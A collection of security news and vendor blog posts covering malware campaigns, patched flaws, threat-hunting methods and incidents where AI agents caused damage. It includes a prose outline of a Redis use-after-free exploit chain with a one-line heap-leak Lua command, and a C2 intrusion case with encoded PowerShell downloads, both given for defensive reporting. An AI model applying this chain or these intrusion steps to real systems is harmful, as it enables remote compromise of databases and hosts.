ThreatsDay Bulletin: AI Agents Gone Wrong, Sketchy C2 Tools, ClickFix Tricks, JS Backdoors & 20+ New Stories

It got stupid again.

The internet still feels held together with tape. Bad plugins, old bugs, fake tools, trusted apps doing shady things. Same mess, new wrapper. And now the weird stuff is normal. Forums go down and come back worse. Cheap hackers get better toys. AI starts breaking real systems. Great.

Read the whole thing before it ruins your week anyway.

1. Unauthenticated SSRF risk

   Cisco has released fixes to address a high-severity security flaw in Unified Communications Manager (CVE-2026-20230, CVSS score: 8.6) that could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. "This vulnerability is due to improper input validation for specific HTTP requests," Cisco said. "An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root." The issue has been addressed in Cisco Unified CM and Unified CM SME Release versions 14SU6 and 15SU5. Cisco said it's aware of the availability of proof-of-concept exploit code for the flaw, but noted there is no evidence of active exploitation. It credited an independent security researcher working with SSD Secure Disclosure for reporting the vulnerability.

2. Mobile spyware operation

   Russia's Federal Security Service (FSB) has disclosed details of what it described as a "large-scale action" undertaken by foreign intelligence services to stealthily implant spyware on the mobile devices of high-ranking officials in the country. "This software was utilized to exfiltrate existing data, intercept ongoing conversations, and conduct covert audio and video surveillance of the immediate surroundings of the electronic devices, with the ultimate objective of obtaining sensitive information," the FSB said. Russia did not reveal who was behind the attacks, but noted the "representatives of foreign intelligence services" leveraged the technical capabilities of major international IT corporations to exfiltrate sensitive data from the devices. This specifically included the exploitation of mobile communication channels, the agency added. An investigation into the activity is ongoing, with the FSB also initiating a criminal case to investigate the matter.

3. Layered keylogger lures

   Threat actors have been relying on social engineering over the past few months to push VIP Keylogger via loaders written in JavaScript, batch scripts, and Visual Basic Script (VBS). "Attackers are masquerading as legitimate business communications such as bank payment notifications, procurement orders, and logistics updates to lure users into opening malicious files," Splunk said.

4. Crypto sanctions escalation

   The U.S. Treasury's Office of Foreign Assets Control (OFAC) has announced sanctions against Nobitex, Iran's largest cryptocurrency exchange, for facilitating payments related to terrorist activities. "Nobitex has provided significant support to the regime, processing more than 50 percent of all Iranian digital asset inflows in 2025 and facilitating payments tied to Iran's terrorist activities, sanctions evasion efforts, and Islamic Revolutionary Guard Corps (IRGC)-linked transactions, including activity associated with IRGC-affiliated ransomware actors," the Treasury said. The sanctions also extend to Nobitex's chairman, co-founder, and former CEO, Amir Hossein Rad, as well as other Nobitex leaders and officials, and three other exchanges: Wallex, Bitpin, and Ramzinex. According to Chainalysis, Nobitex processed over 50% of all Iranian digital asset inflows last year. The four exchanges accounted for roughly $7.7 billion, 78% of Iran's USD 9.9 billion in attributed 2025 crypto volume, per TRM Labs.

5. Cybercrime forum fallout

   The July 2025 law enforcement takedown of XSS, a prominent Russian-speaking cybercrime forum, didn't dismantle the ecosystem. Rather, it fractured it into competing, harder-to-track factions, Flashpoint said. The collapse has triggered an exodus into new, unvetted, and often adversarial communities. Some of the new forums that have rushed to fill up the void left by XSS include DamageLib (launched by legacy moderators of XSS), Rehub (launched by another former XSS moderator), XSS.pro (a resurrection using old backups and suspected to be a law-enforcement honeypot), and XSSF (started by a pro-Russian Telegram hacking group).

6. RMM abuse surge

   A lesser-known remote desktop tool called Tiflux is being used in a growing number of attacks to establish persistence, transmit screenshots, and run commands to collect system profiling information. "Threat actors behind the rogue Tiflux incidents also installed UltraVNC, an open-source remote access tool, sideloaded other commercial RMMs, including Splashtop and ScreenConnect, and installed an outdated driver that can permit the threat actor to elevate their own privileges on an infected system," Huntress said. "Threat actors continue to test and weaponize the use of commercial remote access management tools."

7. Malware delivery network

   A threat cluster tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates (aka SocGholish) social engineering techniques on compromised sites. Thousands of websites are estimated to have been compromised, directing users to malicious infrastructure. DriveSurge primarily acts as an initial access broker (IAB) operating on a pay-per-install (PPI) model, enabling follow-on attacks. Visitors of compromised websites are steered through a traffic distribution system (TDS) known as zTDS, which profiles the system and decides whether the visitor should be served a ClickFix or a FakeUpdates lure. zTDS, in use since at least 2015, is publicly available at ztds[.]info. "Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites' owners or their visitors," Silent Push said. The campaign has been active since September 2025.

8. Sensitive data leak

   The Spanish National Police has arrested an unidentified individual for leaking sensitive information related to members of various critical state organizations, including the National Cybersecurity Institute (INCIBE), the State Attorney General's Office, the National Police, the Civil Guard, and the National Security Council.

9. JavaScript backdoor malspam

   Intrinsec haș disclosed that multiple malspam campaigns have been used to distribute a JavaScript-coded backdoor. "The targets of those campaigns were from all regions and sectors, notably energy and finance ministries, including in the CIS region," the company said. "We believe the campaigns to be financially motivated and operated for email account compromise (EAC) and/or business email compromise (BEC)." The activity was observed in March 2026.

10. On-chain malware delivery

    Cybersecurity researchers have flagged an intrusion in which threat actors used the EtherHiding technique to route ClearFake payload delivery through smart contracts on the BNB Smart Chain testnet. "The attack chain ended with two simultaneously deployed stealers, SectopRAT and ACRStealer, alongside an on-chain execution tracker that confirmed each victim compromise in real time," Trend Micro said.

11. Cloud attack tradecraft

    Nation-state hacking groups like APT29, APT33, and UTA0355 are exploiting ROADtools, a Python-based open-source framework for red-teaming and research, to blend in with normal traffic and evade detection. "ROADtools operates through legitimate Microsoft APIs and can mimic typical traffic," Palo Alto Networks Unit 42 said. "Further defense evasion can be achieved by configuring request attributes such as user-agent strings. These capabilities have made ROADtools a valuable asset for attackers. Nation-state threat actors have used it in recent cloud intrusions for discovery, persistence, and defense evasion. Attackers involved in a targeted phishing campaign in early 2025 used tooling that matches ROADtools' token management capabilities."

12. Data-only extortion rises

    Pure data-exfiltration campaigns without deploying ransomware to pressurize victims are on the rise. In 2025, such attacks have primarily targeted professional services, healthcare, and consumer services firms. "Interestingly, while manufacturing remains the single most disrupted sector overall, construction has witnessed a 44% year-over-year increase as a data-only extortion hotspot," Unit 42 said. "These firms are attractive targets due to lucrative financial blueprints and bidding data combined with data egress controls."

13. AI-assisted evasion testing

    An unknown threat actor has been observed using artificial intelligence (AI) technologies to automate Active Directory discovery and refine endpoint detection and response (EDR) evasion tactics in a red team post-exploitation framework. "Analysis revealed that AI for malware development was more limited and was mainly used to coordinate workflows and support experimentation," Sophos said. "The actual EDR-bypass path was a structured engineering test cycle that included human review and iteration." To develop tools for bypassing EDR agents, the attacker is said to have used Cursor and Anthropic Claude Opus. At the core of the framework is a Python tool that generates Go and Rust payloads for testing with an aim to resist sandboxing, antivirus, and EDR detection. This approach was used to build nearly 80 modules covering more than 70 techniques. Also attributed to the threat actor are Python-based malware development scripts for injecting shellcode into legitimate Windows executables and a Telegram bot API-based external command and control (C2) mechanism. "The use of AI agents to accelerate tool development and test evasion techniques lowers the barrier to entry for sophisticated red team-style attacks," Sophos said. "However, this shift does not change how defenders should protect themselves." The framework is said to be built for stealthy post-exploitation activity in target environments, linking it to "known ransomware deployment and data theft operations."

14. Steam-hosted malware payloads

    A newly identified malware is using Steam Community profile comments to host malicious payloads for WordPress, hiding malicious infrastructure behind Valve's legitimate platform. "The malware employs invisible Unicode characters to conceal payloads within Steam profile comments, enabling steganographic data encoding that evades traditional text-based detection methods," GoDaddy said. "A cookie-authenticated backdoor enables remote code execution, allowing attackers to modify plugin and theme files by sending base64-encoded PHP code via POST requests." The malware performs two primary functions, including client-side JavaScript injection, which fetches encoded URLs from Steam profile comments, decodes them, and injects external JavaScript into WordPress pages, and a server-side backdoor that provides cookie-authenticated remote access for modifying PHP files across plugins and themes. The campaign was first detected in July 2025. The malware has been detected on approximately 1,980 WordPress sites. It is unclear how the websites are breached, but it's assessed that the initial infection vector could be stolen admin logins, compromised FTP/SFTP credentials, the exploitation of a vulnerable WordPress theme or plugin, or a supply chain compromise.

15. Trusted tools abused

    Flare.io has disclosed details of FalkonC2, a commercial hacking tool that appears designed to hide inside enterprise environments by abusing trusted remote access software. "FalkonC2 has an enterprise version called Rotemelli2 that runs in memory, rotates its command-and-control domains every 72 hours, and uses tools such as ScreenConnect, Datto, and SimpleHelp to quietly launch attacks," the company said in a statement. An analysis of dashboard telemetry suggests active enterprise infections across the U.S., Australia, the Netherlands, and Poland. The framework also checks infected machines for QuickBooks and Sage50 data, suggesting attackers are looking for accounting systems they can quickly exfiltrate.

16. AI vulnerability surge

    Anthropic is broadening access to its Project Glasswing program, adding approximately 150 organizations in 15 countries for access to its Claude Mythos Preview. "The bottleneck in cybersecurity is now verifying, disclosing, and patching the large numbers of vulnerabilities that Mythos-class models can surface," the company said. The growing number of flaws identified with the help of AI models has shifted the scales from discovery to patching. A recent report from the Cloud Security Alliance (CSA), the SANS Institute, and the Open Worldwide Application Security Project (OWASP) concluded that in the near term, organizations are "likely to be overwhelmed" by threat actors using AI to find and exploit vulnerabilities faster than defenders can patch them. "The cost and capability floor to exploit discovery is dropping, the time between disclosure and weaponization is compressing toward zero, and capabilities that previously required nation-state resources are now becoming broadly accessible," the report said.

17. Linux flaw under attack

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a Linux Kernel flaw (CVE-2022-0492, CVSS score: 7.8) to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the flaw by June 5, 2026. "Linux Kernel contains an improper authentication vulnerability which could allow for privilege escalation via the cgroups v1 release_agent feature," CISA said. The development comes after Kaspersky said it observed the flaw, along with CVE-2019-5736 and CVE-2024-21626, being exploited in attacks aimed at container environments.

18. Fake image tools deliver malware

    A new ClickFix-style lure is being dressed up as free image-editing tools to deliver CastleLoader, which then drops both NetSupport RAT and a custom .NET stealer called CastleStealer. "The sites look like every other 'remove your photo background' service with uploads, progress bars, and download buttons, but the entire UI is fake," Huntress said. The activity has been codenamed BackgroundFix. CastleLoader is attributed to a threat cluster known as GrayBravo.

19. Session theft defense

    Google has revealed that Device Bound Session Credentials (DBSC) in the Chrome browser is now generally available and enabled by default for Google Workspace users. "DBSC strengthens account security after users are logged in and helps bind a session cookie - small files used by websites to remember user information - to the device a user authenticated from," Google said. "Even if malware was present on the user's device, DBSC reduces the risk of session theft and makes it meaningfully more difficult for malicious actors to exploit stolen session cookies." The feature was formally released in April 2026.

20. Adobe abused in phishing

    Cybercriminals are weaponizing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward. Opening an HTML attachment in the email message serves a login form urging the recipient to enter their credentials. The captured information is delivered to the domain "lnkd.tt.omtrdc[.]net/rest/v1/delivery," after which they are redirected to the LinkedIn site. "This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform," Malwarebytes said. "But the campaign isn't using Adobe Target to receive the phished credentials. Instead, attackers are abusing Adobe Target as a redirect/abuse point in the phishing flow."

21. Supply chain delay defense

    RubyGems has included a cooldown, a time-based filter, in Bundler version 4.0.13 that refuses to resolve to a version until it has been public for at least "N" days. "Releases too new to have been scrutinized are passed over in favor of ones that have aged past the window," Hiroshi Shibata, RubyGems maintainer, said. "It is opt-in, and complements rather than replaces existing defenses like mandatory 2FA and trusted publishing." Users can declare a "small cooldown" on the source in the Gemfile. The efforts go along with other initiatives like AI-assisted vulnerability scanning against the most critical gems in the registry.

22. Iran-linked Israel attacks

    ESET said it recorded an unusual spike in Iran-aligned activity against Israeli targets between October 2025 and March 2026 that could not be linked to previously known groups. "Two unattributed activity clusters, Rusty Boots and MoKhargosh, demonstrated both espionage capabilities and destructive potential - including deployment of a bootkit-style wiper and retaining destructive tooling for later use - whereas a third, MOØN Badr, appears to have been limited to targeted espionage," the Slovakian company said. MoKhargosh, first observed in January 2026, used Go-compiled binaries in attacks targeting Israel. This includes a backdoor called GoKhargosh, along with wipers, filecoders that overwrite files with junk data, and a wiper that targets the master boot record to render the system unbootable. MOØN Badr, on the other hand, singled out three unidentified victims in Israel in early January 2026 to deliver the MOØN AGENT backdoor via phishing emails to facilitate command execution and file uploads and downloads.

23. Fuel tank systems exposed

    The U.S. government has issued an advisory urging organizations to take steps to defend against attacks targeting U.S.-based automatic tank gauge (ATG) systems by securing them with strong passwords and by removing them from the internet to reduce public exposure. The activity, which remains unattributed, involves the attackers compromising internet-exposed ATG systems via hard-coded credentials, command execution, and SQL injection vectors, followed by escalating privileges to obtain full administrator rights and modifying the system functions. "Should a cyber threat actor exploit these vulnerabilities and compromise an ATG system, they could disrupt or manipulate the below critical functions by interfacing directly with the tank management as though they possessed legitimate physical access to the system console," government agencies said.

24. Verified call defense

    Google has announced a fake call detection feature, built on Rich Communication Services (RCS), to Android devices running versions Android 12 and later that verifies whether a call is coming from the caller's actual Android smartphone. Enabled by default, the alert is designed to avoid falling victim to deepfake impersonation and call spoofing in real time. "When a contact calls you and you're both using Phone by Google, their device sends a silent confirmation signal in real time to your device to verify the call is legitimate and truly coming from the contact's device," Google said. "If a scammer tries to impersonate your contact, that initial confirmation signal will be missing. Your device will instantly notice this and ping your contact's actual device to double-check. If their real device says, 'I'm not making a call right now,' you'll get a warning on your screen advising you to hang up immediately." Because the digital handshake uses end-to-end encrypted RCS technology, Google said the process is completely private. That said, the feature requires users to have three Google apps installed: Phone by Google, Contacts, and Google Messages. It will roll out globally this month, starting with Pixel devices.

25. Agentic AI failures

    An analysis of 7,200 publicly reported AI-security and operational incidents has identified "344 verified enterprise-relevant agent-inflicted damage cases between September 2023 and May 2026, including 188 incidents where autonomous AI systems caused direct organizational harm without any external attacker involvement," Cyera researchers Ehud Halamish, Assaf Morag, and Vladimir Tokarev said. "The majority of confirmed incidents involved real production impact rather than theoretical AI risk scenarios. Observed outcomes included deleted databases, destructive cloud actions, unauthorized financial operations, runaway API spending, service outages, exposed secrets, and silent integrity corruption inside enterprise environments. As agents gain broader permissions and deeper integration into SaaS, cloud, development, and business environments, the AI interaction layer itself increasingly becomes part of the enterprise attack surface and critical data perimeter."

The lesson is boring because the lesson is always boring. Patch faster, kill exposed admin panels, stop trusting "safe" tools by name, and watch the weird edges where attackers like to hide. The cheap stuff still works because too many teams leave it cheap.

Security is not magic. It is inventory, logs, least privilege, backups, tested restores, and people who notice when something normal starts acting wrong. Do that well, and half this mess gets a lot less exciting. That is the point.

from The Hacker News https://ift.tt/VCOF57a
via IFTTT

Winning the cyber marathon with Tony Giandomenico

In the high-speed world of cybersecurity, the difference between a breach and a breakthrough often comes down to endurance. Tony Giandomenico, Senior Director of Product Management with Cisco Talos, joins me to discuss how he balances the intensity of leading major product launches with the grueling discipline of Ironman triathlons.

Beyond the technical specs and new threat hunting features, this conversation dives deep into the human side of leadership. Tony shares his hard-won lessons on the power of communication, the importance of knowing your "why," and how to navigate the complexities of a 30-year career without losing your focus.

Amy Ciminnisi: You have been in the thick of the cyber security world for a while now, and a lot of things have shifted in this field. So what has been the biggest surprise for you, and what keeps you excited about leading the charge on the product side?

Tony Giandomenico: Well, I would probably say that the biggest shift over the last six months has been the increase rate of the capabilities of these frontier models. I'm the first one not to jump on the bandwagon of this stuff, because I've been doing this for about 30 plus years or so, but I think this feels a little different. The capabilities are increasing, and I think what that means to cybersecurity is a big shift. How do we deal with all that? From the adversary side, they're actually breaking in the networks like they typically do. They're moving laterally within the environment. They're evading different types of security controls. Finding vulnerabilities, exploiting those vulnerabilities, all of that stuff.

It's also going to be supercharged on the defensive side. Of course, you don't bring a knife to a gun fight, right? You're going to use the same AI technology — you know, the same frontier models — to speed things up there as well. From the product management side, I think we're going to see the things that we would have previously seen five years down the road a lot sooner. And that's kind of that's what kind of excites me about everything — that opportunity to explore the art of possibility is a lot more at your fingertips where it wasn't necessarily before.

AC: We specifically lined this episode up with the Cisco Talos Threat Hunting launch, which you played a major role in. For people who aren't familiar, can you explain what it is?

TG: Threat hunting is where we're looking for different types of threats that are circumventing our existing security control alerts, detection mechanisms, and so on. When defenders invest in these different types of technologies that are automatically detecting alerts or threats in your environment, the challenge that they have is the sensitivity meter. If they set it to be too high, the team might get inundated with false positives, and then that particular product isn't really worth that investment because you're constantly have to investigate those. So the sensitivity meter has to find some place in the middle. That's where it gives these stealthy threat actors a place to live. So you have a combination of AI and human-in-the-loop services, where we build hypotheses to identify actors that may have actually already circumvented your security controls.

Currently, we're hunting in the endpoint telemetry side (e.g., Secure Endpoint) that we offer our customers today. With this expansion, we're expanding it out to our flagship firewall product. So we'll be hunting within Secure Firewall as well as identity, which actually includes Duo and CII, which is Cisco Identity Intelligence.

AC: How do you keep your cool and stay focused on the why behind the work when you're dealing with the intensity of a major launch?

TG: Before coming to Cisco, I had a small cybersecurity consulting company for about 10 years or so out in the Hawaiian Islands. I had the domain expertise, but I had to learn financial aspects, sales, and marketing. I also had to understand what makes people tick. I wasn't able to talk to every individual the same way to get them on board with things. So the biggest thing that I took away when I went from running my business to working in a larger organization was that when folks are in different departments, there are competing priorities and I have to influence them. I have to get them to understand and believe in the vision. So if you go in there with that mindset, knowing that it's not going to flow exactly how you envisioned, things just work out.

---

Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.

from Cisco Talos Blog https://ift.tt/nK4txCd
via IFTTT

Hypotheses, telemetry, and human judgment: Inside Cisco Talos Threat Hunting

By Ron Scott-Adams

Most security tools operate on a simple principle: If a known-bad pattern appears, fire an alert. This works well enough for many threats, but it fails against adversaries who closely study detection thresholds and deliberately stay under them. 

Cisco Talos Threat Hunting operates on a different principle. Instead of waiting until we’re sure we can cross an alerting threshold, we start with a hypothesis about what specific adversary behavior would look like in the telemetry, and then search for it. Using both AI and human-driven processes, including pioneering hunts built from Talos’ latest threat research, we continuously search for threats that traditional detection misses.

These hunts operate at the leading edge of our intelligence, where patterns are compelling but require expert judgment to distinguish from benign activity. Talos threat analysts provide this judgement to ensure maximum fidelity for your threat landscape. 

This post covers how that works in practice.

Hypothesis-driven hunting vs. alert-driven detection 

A detection rule says, "If X happens, alert." A hunt hypothesis says, "Given this specific threat actor uses these specific techniques, what would those techniques look like in this specific telemetry source?" 

The distinction matters because it inverts the workflow. Detection requires prior knowledge encoded into a rule. Hunting requires only a plausible theory about adversary behavior and the telemetry to test it against. 

Our hypotheses come from multiple sources: active threat intelligence on adversary tradecraft, findings from Cisco Talos Incident Response engagements, and patterns observed across global telemetry from nearly 50 million sensors. When Talos sees a new technique in the wild, we can build a hunt for it before a detection signature exists.

Here are a few examples of these threat hunts:

• Python User-Agent connections to malicious ASN infrastructure. Legitimate Python HTTP requests exist in most environments, but Python calling out to hosting providers with poor reputation scores is a different signal entirely. 
• MSIEXEC User-Agent making connections to suspicious or malicious ASNs. MSIEXEC fetching remote packages is a known living-off-the-land (LOTL) technique. The user-agent string persists in firewall connection logs even when the payload itself is encrypted. 
• Domain generation algorithm (DGA) detection via AI/ML. Algorithmically generated domains have statistical properties (character distribution, entropy, n-gram frequency) that distinguish them from human-registered domains. Our models flag DNS queries that match these patterns. 
• Connections to EVILEMPIRE ASN ranges. Certain autonomous systems have a long, documented history of hosting command-and-control (C2) infrastructure. Outbound connections to these ranges warrant investigation regardless of the specific destination IP. 
• User-Agent and application outliers. Baseline what's normal for an environment, then surface what deviates. A curl binary running on a finance team's workstation at 2am is not the same signal as curl running in a CI/CD pipeline. 
• Endpoint detection and response (EDR) research findings correlated with network indicators of compromise (IOCs). When endpoint telemetry reveals a new threat, the associated network indicators become hunt targets across firewall data for all customers.

Each of these hunts runs continuously. The AI engine executes them at scale, 24 hours a day, across all enrolled customer environments. It surfaces candidates. Then a human analyst investigates.

Case study: KongTuke C2 discovery through multi-domain correlation 

The value of correlating telemetry across security domains is easiest to explain with a real example. During a recent engagement with a customer, Talos analysts identified active KongTuke C2 activity by combining firewall and endpoint data in a way that neither source could have accomplished alone. This is the kind of continual awareness we are seeking to bring to customers everywhere with Talos Threat Hunting.

What the firewall showed 

Cisco Secure Firewall telemetry recorded outbound ConnectionEvents to “144.31.221.82” on port 6060, with a URL path of /capcha9856. This pattern is consistent with a Traffic Direction System (TDS) infection, where a compromised website redirects visitors through a chain of intermediate servers before landing on a malicious payload host. 

The firewall gave us the "what" and "when" — a specific device was reaching out to known-bad infrastructure at a known time. But the firewall alone could not tell us how the connection was initiated or what happened next on the host.

What EDR added 

Pivoting to Cisco Secure Endpoint data for the same DeviceIP, we pulled the full process history around the time of the connection. The endpoint telemetry revealed:

1. A cmd.exe process spawning powershell.exe with an -EncodedCommand parameter containing a Base64-encoded payload 
2. The decoded payload executing Invoke-WebRequest to fetch a file named script.ps1, dropping it into the user's ApplicationData directory 
3. A separate curl.exe process making requests to the same C2 infrastructure the firewall had flagged 
4. Post-execution cleanup via Remove-Item, attempting to delete traces of the downloaded script

Why neither source alone was sufficient 

The firewall saw an outbound connection to a suspicious IP. That's useful, but not conclusive on its own. Hundreds of legitimate services might generate similar connection patterns. The EDR saw obfuscated PowerShell execution. That's suspicious, but without the network context confirming the destination was a known C2 server, it could be a false positive from an overzealous admin script. 

Together, they told a complete story: initial compromise via TDS redirect, payload delivery through encoded PowerShell, C2 communication confirmed by both endpoint process tree and network connection logs, and active evidence of anti-forensics (file cleanup). This is a confirmed intrusion with clear remediation steps, not an ambiguous alert requiring hours of analyst triage. 

Broader sweep 

Once we had the process hashes and file paths from EDR, we searched across the full customer environment for other hosts exhibiting the same behavior. This turned a single finding into a scoped understanding of how far the compromise had spread.

How AI and human analysts divide the work 

Talos Threat Hunting runs on a hybrid model where each component does what it's best at. 

The AI engine handles volume and persistence. It executes hundreds of hunt hypotheses continuously across all customer environments. It applies statistical models (DGA detection, behavioral baselining, anomaly scoring) to telemetry streams at a scale no analyst team could match. Its job is to reduce the search space by taking the full volume of telemetry and surfacing the subset that warrants human attention. 

Human analysts handle context and judgment. A statistical anomaly is not the same as a confirmed threat. Analysts validate findings by correlating across data sources, applying knowledge of the customer's environment, and making determinations that require understanding adversary intent. When an analyst confirms a finding, the customer receives a written notification explaining what was observed, why it matters, how it maps to known techniques (MITRE ATT&CK or equivalent), and specific remediation guidance. 

This is not "AI finds threats and humans approve them." The AI surfaces candidates from a space too large for humans to search manually. Humans then do investigative work that AI cannot always reliably perform: understanding whether a particular behavior is malicious or benign given the full operational context of that specific environment.

The feedback loop: Hunting improves detection 

Every confirmed finding is first reported to the customer, then evaluated for a second question: “Should this have been caught by automated detection?” 

If the answer is yes, that means a detection gap exists. Maybe a rule needs tuning, a sensor configuration needs adjustment, or the customer's policy allows something that creates unnecessary exposure. In each case, the finding feeds back into product improvement or customer-specific configuration recommendations.

This creates a cycle: Intelligence drives hypotheses, hypotheses drive hunts, hunts produce findings, findings improve detection, and better detection raises the bar for what qualifies as "between the alerts." The space we hunt in gets harder to exploit over time. 

What this means for your security team 

If you have a mature SOC, this covers the ground your team is not currently reaching. These hypotheses are built from global threat intelligence, executed continuously, across telemetry your analysts may not have time to proactively search. The findings are validated before they reach you, so they add signal without adding noise. 

If you are running a lean security operation, this provides a hunting capability that would otherwise require dedicated headcount, specialized tooling, and the institutional knowledge to know what "normal" looks like well enough to spot deviations. 

Either way, the output is not more alerts. It's written findings with context, mapped to adversary techniques, with clear next steps that you can act on directly. To learn more, contact your Cisco account team and explore what’s possible with Cisco Talos.  

Some products or features described may be in various stages of development and offered on a when-and-if available basis. Cisco reserves the right to change delivery timelines and will have no liability for any delays or failures to deliver.  

from Cisco Talos Blog https://ift.tt/XhyNnip
via IFTTT

FlutterShell Backdoor Spreads to macOS via Malicious Google and YouTube Ads

Cybersecurity researchers have shed light on a macOS malvertising campaign codenamed Operation FlutterBridge that spreads a new backdoor called FlutterShell.

According to Palo Alto Networks Unit 42, the campaign is said to be the next stage of a previously reported activity cluster dubbed JSCoreRunner (aka FileRipple) in late August 2025. The cybercrime group behind the two attack chains is being tracked under the moniker CL-CRI-1089. The attackers are assessed to be active since at least 2023.

"Built using the Flutter framework, FlutterShell infects targets with adware via malicious desktop applications," Unit 42 said. "In addition to its adware functionality, the payload possesses backdoor capabilities, including shell command execution and file system manipulation."

Operations attributed to CL-CRI-1089 also include Recipe Lister and Calendaromatic, both of which fall under a broader designation known as TamperedChef (aka EvilAI), an ongoing series of campaigns that involve using trojanized versions of productivity software to deliver potentially unwanted programs (PUPs) and adware.

These campaigns distribute malicious Google and YouTube advertisements using a network of Google-verified shell companies, with the ads acting as a lure to trick targets into deploying malware that masquerades as legitimate desktop applications. Some of the front companies are AdsParkPro LTD, Advantage Web Marketing LLC, and SOFT WE ART LIMITED (now PACIFIC TRADE SOLUTIONS LTD).

Target audiences for these ads are macOS users in the U.S., Canada, Australia, France, and Germany. Although none of the Google Ads accounts are currently accessible via the Google Ads Transparency Center, records from YouControl and the U.K. government's Companies House register indicate that the firms all have links to Ukrainian individuals.

The latest iteration entails the deployment of FlutterShell, which supports arbitrary command execution, file system interaction, and environment variables exfiltration. These efforts have been detected as recently as March 2026.

"Upon execution, the malware modifies Google Chrome configuration files to hijack the browser, forcing all traffic through an attacker-controlled, ad-filled intermediary site," researchers Ido Asher, Noa Dekel, and Tom Fakterman said. "All observed samples were signed with valid Apple Developer IDs and successfully passed notarization, meaning Apple's automated security checks did not flag them as malicious at the time of submission."

What makes FlutterShell noteworthy is that it implements a WebView-based architecture that utilizes a JavaScript-to-native bridge, thereby allowing the adversary to host malicious logic on an external website, rather than embedding it into the binary. This, in turn, makes it possible to dynamically alter the malware's behavior in real time without having to recompile or push out an updated version to compromised hosts.

"In WebView-based architecture, a native application uses an embedded web browser component to display content," Unit 42 explained. "The JavaScript-to-native bridge acts as a communication channel between this web content and the host native application, allowing them to exchange data and cross-invoke functionality."

Three different variants of FlutterShell, viz., PodcastsLounge, PDF-Brain, and PDF-Ninja, have been identified. This, coupled with the presence of unfinished functions in the JavaScript logic hosted on the attackers' infrastructure, suggests the malware is likely under active development.

Some of the variants, PDF-Brain and PDF-Ninja, feature an artificial intelligence (AI)-powered summarization capability by relaying documents through an attacker-controlled server before processing them. FlutterShell also enables system fingerprinting and the theft of browser session data.

FlutterShell has also been found to share technical similarities with Calendaromatic and Recipe Lister, the most obvious being the WebView-based code architecture to facilitate dynamic payload changes. What's more, Advantage Web Marketing LLC has been observed not only spreading malicious ads but also acting as the signatory for Windows adware variants associated with the cluster.

"The evolution from JSCoreRunner to FlutterShell represents a significant increase in technical depth for the attackers behind CL-CRI-1089," Unit 42 said. "Furthermore, the scale of the distribution network, coupled with the verified shell entities used to bypass ad-network vetting, highlights the persistent danger of malvertising. The coordination of multiple shell entities, and the rapid development and delivery of new FlutterShell variants, indicates that this campaign is far from over."

from The Hacker News https://ift.tt/IMQnCNH
via IFTTT

Autonomous AI Tool Finds 2-Year-Old RCE Flaw in Redis (CVE-2026-23479)

Redis has patched a use-after-free in its blocking-client code that lets an authenticated user run arbitrary OS commands on the machine hosting the database. The flaw was found by an autonomous AI tool built to hunt bugs in large codebases.

Tracked as CVE-2026-23479, the flaw was introduced in Redis 7.2.0 and remained in every stable branch until the May 5 fixes, unnoticed for over two years. NVD rates it 8.8 under CVSS 3.1; Redis lists it as 7.7 under CVSS 4.0. It was reported by Team Xint Code, and a complete technical write-up is now public.

The cloud footprint makes this worse. Wiz's analysis, published with the exploit writeup, puts Redis in a large majority of cloud environments, with most of those instances running without a password. The exploit needs an authenticated session, but in a default deployment, the default user already holds every privilege the chain requires.

The flaw lives in unblockClientOnKey() in src/blocked.c, which fires when a key event wakes a blocked command. The function dispatches the queued command through processCommandAndResetClient(), then keeps using the same client pointer. The problem: that function can free the client as a side effect, and its own header comment says so. The caller ignores the return value and reads the freed structure anyway, a use-after-free (CWE-416).

Per Wiz's analysis, the bug took two commits to create. A January 2023 refactor (PR #11012) added the unchecked call. A March 2023 change (PR #11568) added more client access after it. Neither was dangerous alone. Together, they reached general availability in 7.2.0 and survived multiple rounds of security review.

The chain starts by leaking a heap address. From there it frees a client and slips a fake one into the same memory, then turns Redis's own memory accounting against itself to overwrite a function pointer.

The published version runs in three stages.

• First, a one-line Lua script (EVAL "return tostring(redis.call)" 0) leaks a heap pointer.
• Second, the attacker grooms client memory limits, parks a bloated client on a stream, then drops the limits and wakes it. Redis frees the blocked client mid-call, and a pipelined SET immediately reclaims the freed slot with a fake client structure.
• Third, Redis's routine memory accounting in updateClientMemoryUsage() performs an out-of-bounds decrement using attacker-controlled fields, aimed at the Global Offset Table to repoint strcasecmp() at system(). The next command Redis parses runs as a shell command.

The official Redis Docker image makes the last step easier. It ships with only partial RELRO, leaving the GOT writable at runtime. ASLR and PIE do not help here, since the write is relative to a global whose offset is fixed at build time.

The full chain needs an authenticated session with CONFIG SET, EVAL, stream commands (XREAD/XADD), and basic SET/GET, which maps to the @admin, @scripting, @stream, and @read/@write ACL categories.

The default user has all of them, and in most deployments, these privileges are grouped into a single shared application or operator role. Denying CONFIG outright breaks this specific chain, though not the underlying use-after-free.

Team Xint Code demonstrated the working RCE at ZeroDay.Cloud 2025, Wiz's hacking competition in London last December. Theori describes Xint Code as an autonomous AI security tool built to hunt bugs in large codebases.

Redis said it had no evidence of exploitation in its own or customer environments, and as of publication no public in-the-wild reports have surfaced. The full technical chain is now public, increasing the risk of follow-on exploitation.

Upgrade to the patched minor for your series: 7.2.14, 7.4.9, 8.2.6, 8.4.3, or 8.6.3, all released on May 5. Minor upgrades within a series are meant to be drop-in. Managed Redis services patch on their own schedules, and Redis says Redis Cloud is already done.

Branch	Affected	Fixed
7.2.x	7.2.0 to 7.2.13	7.2.14
7.4.x	7.4.0 to 7.4.8	7.4.9
8.2.x	8.2.0 to 8.2.5	8.2.6
8.4.x	8.4.0 to 8.4.2	8.4.3
8.6.x	8.6.0 to 8.6.2	8.6.3

If you cannot patch yet: keep Redis off the public internet and behind TLS, tighten ACLs so no single role holds @admin, CONFIG, and @scripting together, and deny @scripting if you do not use Lua, which kills the Stage 1 leak.

